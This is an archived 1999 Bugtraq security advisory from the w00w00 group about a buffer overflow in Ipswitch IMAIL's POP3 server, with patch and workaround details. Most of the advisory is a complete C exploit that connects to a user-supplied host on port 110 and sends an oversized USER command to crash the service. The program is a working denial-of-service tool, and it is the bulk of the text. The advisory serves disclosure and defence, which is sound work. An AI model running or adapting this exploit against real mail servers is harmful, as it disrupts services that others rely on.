Archive : 1999 : november : imail - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku
[w00giving '99 #2] IMAIL POP server



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


 Date: Пн, 08 ноя 1999  04:35:52

   От: Shok <shok@CANNABIS.DATAFORCE.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: [w00giving '99 #2] IMAIL POP server

--------------------------------------------------------------------------------




w00w00 Security Development (WSD)



[See http://www.datasurge.net/www.w00w00.org until relocation of

w00w00.org is complete.]



Discovered by: Interrupt (mike@eeye.com)



Due to improper bounds checking in Ipswitch's IMAIL POP3 server, a buffer

overflow occurs when a lengthy username is sent (via "USER <large

username>"). Where the length of <large username> is between 200 and 500

characters.



It has been tested this on version 5.07, 5.05, and 5.06.  According to

Interrupt, it appears to be a DoS (denial of service) attack, but there

has been no further testing to determine if it can be exploited to gain

higher privileges.



---------------------------------------------------------------------------

Exploit (by Interrupt):



/*

 * IMAIL 5.07 POP3 Overflow

 * By: Mike@eEye.com

 *

 * Demonstrates vulnerability

 */



 #include <stdio.h>

 #include <string.h>



#ifdef WINDOWS

 #include <windows.h>

 #include <winsock.h>

#else

 #include <sys/types.h>

 #include <sys/socket.h>

 #include <netdb.h>

 #include <netinet/in.h>

#endif



#ifndef WINDOWS

 #define SOCKET_ERROR -1

 #define closesocket(sock) close(sock)

 #define WSACleanup() ;

#endif



char overflow[] =

 "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";



int main(int argc, char *argv[])

{

#ifdef WINDOWS

   WSADATA wsaData;

#endif



   struct hostent *hp;

   struct sockaddr_in sockin;

   char buf[300], *check;

   int sockfd, bytes;

   char *hostname;

   unsigned short port;



   if (argc <= 1)

   {

      printf("IMAIL POP3 Overflow\n");

      printf("By: Mike@eEye.com\n\n");



      printf("Usage: %s [hostname] [port]\n", argv[0]);

      printf("If port is not specified we use '110'\n");



      exit(0);

   }



   hostname = argv[1];

   if (argv[2]) port = atoi(argv[2]);

   else port = atoi("110");



   printf("IMAIL POP3 Overflow\n");

   printf("By: Mike@eEye.com\n\n");



#ifdef WINDOWS

   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)

   {

      fprintf(stderr, "Error setting up with WinSock v1.1\n");

      exit(-1);

   }

#endif



   hp = gethostbyname(hostname);

   if (hp == NULL)

   {

      printf("ERROR: Uknown host %s\n", hostname);

      exit(-1);

   }



   sockin.sin_family = hp->h_addrtype;

   sockin.sin_port = htons(port);

   sockin.sin_addr = *((struct in_addr *)hp->h_addr);



   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)

   {

      printf("ERROR: Socket Error\n");

      exit(-1);

   }



   if ((connect(sockfd, (struct sockaddr *) &sockin,

                sizeof(sockin))) == SOCKET_ERROR)

   {

      printf("ERROR: Connect Error\n");

      closesocket(sockfd);

      WSACleanup();

      exit(-1);

   }



   printf("Connected to [%s] on port [%d], sending overflow....\n",

          hostname, port);



   /* Check to see if we get a +OK error code. If so then proceed. */

   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)

   {

      printf("ERROR: Recv Error\n");

      closesocket(sockfd);

      WSACleanup();

      exit(1);

   }



   buf[bytes] = '\0';

   check = strstr(buf, "+OK");

   if (check == NULL)

   {

      printf("ERROR: NO +OK response from inital connect\n");

      closesocket(sockfd);

      WSACleanup();

      exit(-1);

   }



   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)

   {

      printf("ERROR: Send Error\n");

      closesocket(sockfd);

      WSACleanup();

      exit(-1);

   }



   printf("Sent.\n");



   closesocket(sockfd);

   WSACleanup();

}



---------------------------------------------------------------------------

Patch:



Ipswitch has patched the vulnerability and the latest version can be

downloaded from:

ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe



If you are unable to install the patch, a temporary workaround is to set

the IMAIL monitor to 10 secons, guaranteeing a quick refreshment period.

---------------------------------------------------------------------------



Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum,

interrupt, dmess0r, and K2



People who deserve hellos: nocarrier, minus, daveg, nny, eEye Digital

Security, SecurITeam, dark spyrit (of beavuh), and w00god blake



w00sites that deserve mentioning:

http://www.eEye.com

http://www.napster.com

http://www.technotronic.com

htttp://www.beavuh.org

http://www.securiteam.com